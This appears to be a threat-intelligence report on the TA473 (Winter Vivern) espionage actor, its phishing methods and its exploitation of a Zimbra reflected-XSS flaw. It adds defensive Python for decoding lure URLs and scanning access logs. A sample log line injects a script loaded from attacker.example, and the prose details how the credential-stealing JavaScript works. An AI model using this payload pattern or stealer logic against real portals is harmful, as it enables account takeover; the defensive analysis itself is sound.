- Proofpoint has observed recent espionage-related activity by TA473, including previously unreported instances of TA473 targeting US elected officials and their staff. TA473 is a newly designated Proofpoint threat actor that aligns with public reporting on Winter Vivern.
- Since at least February 2023, TA473 has repeatedly exploited a Zimbra vulnerability (CVE-2022-27926) on unpatched, publicly facing webmail portals to gain access to the email mailboxes of government entities in Europe.
- Proofpoint concurs with SentinelOne's analysis that TA473 targeting superficially aligns with support for Russian and/or Belarusian geopolitical goals as they pertain to the Russia-Ukraine war.
Proofpoint researchers recently promoted TA473 to a publicly tracked threat actor. The activity cluster, known in open-source research as Winter Vivern, has been tracked by Proofpoint since at least 2021.
Who is TA473?
What Does a TA473 Phishing Campaign Look Like?
Proofpoint has observed an evolution of TA473 phishing campaigns since 2021. The threat actor has been observed using opportunistic exploits against its victims, including popular 1-day vulnerabilities such as CVE-2022-30190 ("Follina"), disclosed in May 2022. Most commonly, however, the actor relies on a recurring set of phishing techniques in every email campaign. The tactics below have been observed consistently across both US and European targets, and across credential harvesting, malware delivery, and cross-site request forgery (CSRF) campaigns alike.
- TA473 sends emails from compromised email addresses. These often originate from WordPress-hosted domains that were unpatched or insecure at the time of compromise.
- TA473 spoofs the From field of the email to appear either as a user at the targeted organization or as a relevant peer organization involved in global politics.
- TA473 includes a benign URL, belonging to the targeted organization or to a relevant peer organization, in the body of the email.
- TA473 then hyperlinks this benign, recognizable URL to actor-controlled or compromised infrastructure, which delivers a first-stage payload or redirects to a credential harvesting landing page.
- TA473 often uses structured URI paths that carry a hashed value identifying the targeted individual, an unencoded indication of the targeted organization (typically its webmail hostname), and in some cases an encoded or plaintext copy of the benign URL that was hyperlinked in the initial email.
Figure 1. TA473 email including hyperlinked URL redirecting to a malicious actor-controlled resource.
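The URI structure described above is regular enough to be pulled apart mechanically. As an added example (not Proofpoint's code and not a TA473 artifact), the following Python decodes a lure URL into its parts: the actor-controlled host, any path segment that looks like a target organization's hostname, whether the `id` parameter is hex of a common hash length, and the base64-decoded `url` parameter when one is present. The sample URLs, the hash values and the encoded lure URL in `SAMPLE_URLS` are constructed for the example, modelled on the defanged IOC patterns listed at the end of this post.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed, defanged sample URLs shaped like the IOCs in this post.
# The id values and the base64 payload are made up for the example.
SAMPLE_URLS = [
    "hxxps://ocspdep[.]com/inotes.sejm.gov.pl?id=" + "ab" * 32,
    "hxxps://ocs-romastassec[.]com/redirect/?id=deadbeef01&url="
    + base64.b64encode(b"https://hochuzhit-com.translate.goog/?_x_tr_sl=auto").decode(),
    "https://example.org/news/article?id=42",  # ordinary URL, should not be flagged
]

HEX_HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn a defanged indicator back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def hash_kind(value):
    """Classify a hex string by the digest length it matches, else None."""
    if re.fullmatch(r"[0-9a-fA-F]+", value or ""):
        return HEX_HASH_LENGTHS.get(len(value))
    return None


def decode_b64_url(value: str):
    """Base64-decode a query value and return it only if it is an http(s) URL."""
    # parse_qs turns '+' into ' ', so restore it; also accept the URL-safe alphabet.
    candidate = value.replace(" ", "+")
    candidate += "=" * (-len(candidate) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            decoded = decoder(candidate).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.startswith(("http://", "https://")):
            return decoded
    return None


def analyze_lure_url(url: str) -> dict:
    """Break a candidate lure URL into the fields the TA473 pattern uses."""
    parts = urlsplit(refang(url))
    qs = parse_qs(parts.query)
    id_value = qs.get("id", [None])[0]
    url_value = qs.get("url", [None])[0]
    # A path segment that is itself a hostname is the target org in plaintext.
    org = next((seg for seg in parts.path.split("/") if HOSTNAME_RE.match(seg)), None)
    result = {
        "host": parts.hostname,
        "target_org_in_path": org,
        "id_hash_kind": hash_kind(id_value),
        "decoded_lure_url": decode_b64_url(url_value) if url_value else None,
    }
    result["suspicious"] = bool(org or result["id_hash_kind"] or result["decoded_lure_url"])
    return result


if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        print(analyze_lure_url(sample))
```

The decoded `url` value is the benign link the victim was shown, which is useful for pivoting back to the phishing email; the hashed `id` is per-recipient, so the same infrastructure can be correlated across targets even when the hash itself is opaque.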
Exploitation of Disclosed Zimbra Vulnerability to Target Public Facing Webmail Portals
Beginning in early 2023, Proofpoint observed a trend of TA473 phishing campaigns against European government entities that take advantage of CVE-2022-27926, a vulnerability Zimbra fixed in 2022. The vulnerability affects Zimbra Collaboration (previously "Zimbra Collaboration Suite") version 9.0.0, which is used to host publicly facing webmail portals, and is described as a "reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 [that] allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters." Because the flaw is reflected, the attack is delivered entirely through the hyperlinked URL in the phishing email: a victim who clicks it sends the attacker's script to their own webmail portal, which reflects it back into the page.
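The vulnerable component named above gives defenders something concrete to hunt for on a portal that has not yet been patched. As an added example (not Proofpoint's code, and not TA473's actual payload, which this post does not publish), the following Python scans web-server access log lines for requests to /public/launchNewWindow.jsp whose query string, after repeated URL decoding, contains generic script-injection markers. It assumes the front end writes the common combined log format; the log lines, addresses and the marker list are constructed for the example and are heuristics rather than a signature for this actor.

```python
import re
from urllib.parse import unquote

# Combined log format: ip - - [ts] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
VULN_ENDPOINT = "/public/launchnewwindow.jsp"  # compared case-insensitively
# Generic reflected-XSS markers; assumed heuristics, not the actor's payload.
XSS_MARKERS = ("<script", "javascript:", "onerror=", "onload=", "<svg", "<img",
               "document.", "eval(", "fromcharcode")

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [28/Mar/2023:09:12:44 +0000] "GET /zimbra/ HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [28/Mar/2023:09:13:01 +0000] "GET /public/launchNewWindow.jsp HTTP/1.1" 200 2201 "https://mail.example.gov/" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Mar/2023:09:20:17 +0000] "GET /public/launchNewWindow.jsp?x=%3Cscript%20src%3D%22https%3A%2F%2Fattacker.example%2Fa.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 2208 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Mar/2023:09:21:03 +0000] "GET /public/launchNewWindow.jsp?x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2208 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [28/Mar/2023:09:22:40 +0000] "POST /service/soap HTTP/1.1" 200 512 "https://mail.example.gov/" "Mozilla/5.0"',
]


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_line(line: str):
    """Return a finding dict for a suspicious launchNewWindow.jsp request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if fully_decode(path).lower() != VULN_ENDPOINT:
        return None
    decoded_query = fully_decode(query)
    hits = [marker for marker in XSS_MARKERS if marker in decoded_query.lower()]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "referer": m.group("referer"),
        "markers": hits,
        "query": decoded_query,
    }


def scan_log(lines) -> list:
    """Scan an iterable of access log lines and collect the findings."""
    return [finding for finding in map(scan_line, lines) if finding]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 response to such a request on a version still affected by CVE-2022-27926 means the script was reflected to the victim's browser, so the source address, timestamp and referer should be carried straight into a search of that user's subsequent webmail logins.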
Figure 2. TA473 CSRF infection diagram.
Customized Cross-Site Request Forgery
The JavaScript delivered through the reflected XSS performs the following core functions:
- Steals usernames
- Steals the user's password
- Steals an active CSRF token from a cookie in the web request response
- Caches the stolen values on the actor-controlled server
- Attempts to log in to the legitimate mail portal with the active tokens
- Uses additional URLs in its functionality to:
  - Display POP3 and IMAP instructions hosted on the actor-controlled server
  - Attempt logins to the legitimate webmail portal via its native URL
An extended sequence of the observed script's actions is as follows:
- Establishes the malicious server domain to which stolen user values are cached
- References a targeted account name
- Gets the date and time
- Gets the account name variables
- Sets a timeout window of 1000 (presumably milliseconds, the unit JavaScript timers use)
- Defines a function to send credentials "on click"
- Sends the username and password in URI-encoded form
- If the password has a length of 0 (no password entered), the script prompts the user with "The username or password is incorrect. Verify that CAPS LOCK is not on, and then retype the current username and password." and returns
- The script then logs the username, the password, and the CSRF token from the web request response
- If that attempt fails, the script again attempts to post to the targeted server, fetches the element with ID "lic34yo8o" and removes it from the "body" of the response
- It then again attempts to save the "accountname", username, and password variables
- The script attempts to log in to the legitimate webmail portal using custom hardcoded URI structures that appear to be unique to the targeted domain, appending the previously captured username, password, and CSRF token to those URIs
- The script also has a function to log in with the stolen credential and token content
- The script has a function to show a Zimbra POP3 and IMAP login information page hosted on actor-controlled infrastructure
- The script has a function to show the legitimate webmail portal login window
- The script has a function, "initLoginField", which appears to populate the username and account name in the legitimate webmail login window
- The script has a function to log off the mail server and attempt to retrieve the CSRF token at logout, which is then sent to an actor-controlled server
- The script has a function to retrieve the CSRF token
Advanced Capabilities May be Ideal, but When in Doubt, Persistence is Key
Proofpoint researchers strongly recommend patching all versions of Zimbra Collaboration used in publicly facing webmail portals, especially among European government entities. Additionally, restricting access to resources on publicly facing webmail portals from the public internet is highly recommended, to prevent groups like TA473 from performing reconnaissance against them and engineering custom scripts capable of stealing credentials and logging in to users' webmail accounts. While TA473 does not lead the pack in sophistication among APT threats targeting the European cyber landscape, it demonstrates focus, persistence, and a repeatable process for compromising geopolitically exposed targets. Like a Vivern in a medieval winter, despite having only two legs and a pair of wings, this is likely a threat that will persist year-round.
Indicators of Compromise (IOCs)

| Indicator | Type of IOC |
| --- | --- |
| hxxps://ocs-romastassec[.]com/redirect/?id=[target specific ID]&url=[Base64 Encoded Hyperlink URL hochuzhit-com.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&x_tr_pto=wapp] | Observed payload delivery URL |
| hxxps://ocspdep[.]com/inotes.sejm.gov.pl?id=[Target Specific SHA256 Hash] | Observed payload delivery URL |

Emerging Threats (ET) signatures
- 2034117 – ET TROJAN Wintervivern Activity M5 (GET)
- 2034116 – ET TROJAN Wintervivern Activity M4 (GET)
- 2034115 – ET TROJAN Wintervivern Retrieving Commands
- 2034109 – ET TROJAN Wintervivern Activity (GET) M3
- 2034108 – ET TROJAN Wintervivern Checkin
- 2034107 – ET TROJAN Wintervivern Retrieving Task
- 2034106 – ET TROJAN Wintervivern Activity M2 (GET)
- 2034105 – ET TROJAN Wintervivern Activity (GET)